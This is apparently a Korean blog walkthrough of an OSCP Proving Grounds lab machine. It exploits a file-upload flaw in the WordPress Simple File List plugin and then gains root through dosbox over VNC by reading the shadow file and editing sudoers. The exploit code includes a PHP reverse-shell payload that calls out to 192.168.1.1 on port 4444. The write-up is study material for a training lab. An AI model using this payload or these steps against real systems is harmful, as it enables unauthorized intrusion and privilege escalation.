1.Information Gathering

(1) Port Scan

 

 

 

(2) Web Enum

> port 80

: register 가능

 

: Plugin 결과

 

 

: simple-file-list

 

WordPress Plugin Simple File List

is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress Plugin Simple File List version 4.2.2 is vulnerable; prior versions may also be affected.

 

 

 

> 13000 : Login Page

 

 

 

2. Exploitation

: Arbitary File upload

https://npulse.net/en/exploits/48979

해당 부분 변경해야함
def generate():
    filename = f'{random.randint(0, 10000)}.png'
    password = hashlib.md5(bytearray(random.getrandbits(8)
                                     for _ in range(20))).hexdigest()
    with open(f'{filename}', 'wb') as f:
        payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>'
        f.write(payload.encode())
    print(f'[ ] File {filename} generated with password: {password}')
    return filename, password

-----------------------------------------------------------


def file_select():
    filename = file_name.split(".")[0]+'.png'
    with open(file_name) as f:
        with open(filename, 'w+') as f1:
            for line in f:
                f1.write(line)
    print ('[+] File renamed to ' + filename)
    return filename

 

침투성공

 

 

 

3. Privilege Escalation

 

1차 PE 성공

 

대표사진 삭제

사진 설명을 입력하세요.

dosbox > console 모드로는 실행이 안되기 때문에

그래피컬 모드로 실행시킬 방법을 찾아야 함

 

활성화 중인 포트를 살펴보면

 

5901 포트 + Xvnc가 활성화되어 있고

실행중인 프로세스를 살펴보니

 

 

해당 포트에서 그래피컬 모드 사용이

가능해 보인다.

 

 

포트포워딩 시도

 

 

이번에 처음 써보는 vncviewer

 

 

비번은 commander 사용자 비번이고

접속해보면

 

 

터미널 접속 후

 

dosbox를 실행시켜보면

 

 

 

정상 실행 되고

/etc 를 C 드라이브에 마운트,

 

 

 

상위 권한으로 사용이 가능해

shadow 파일을 읽어보면

정상적으로 읽힌다.

 

sudoers 그룹에 commander 사용자 권한을 새로 부여하면

 

 
마지막 줄에 변동 사항이 반영 메시지가 뜨고

ssh 세션에서 sudo로 루트 시도!

 

 

728x90
저작자표시

'OSCP > Proving Ground' 카테고리의 다른 글

21. Cobweb (GET TO WORK) - Linux* (php 소스 분석 후 injection)  (0) 2022.07.16
20. Zino (GET TO WORK) - Linux  (0) 2022.07.15
18. Maria (GET TO WORK) - Linux* (WP smtp plugin / xmlrpc.php) 중요!  (2) 2022.07.03
17. Pelican (GET TO WORK) - Linux  (0) 2022.06.29
16. Wheels (WARM UP) - Linux (XPath 인젝션)  (0) 2022.06.25

+ Recent posts

티스토리툴바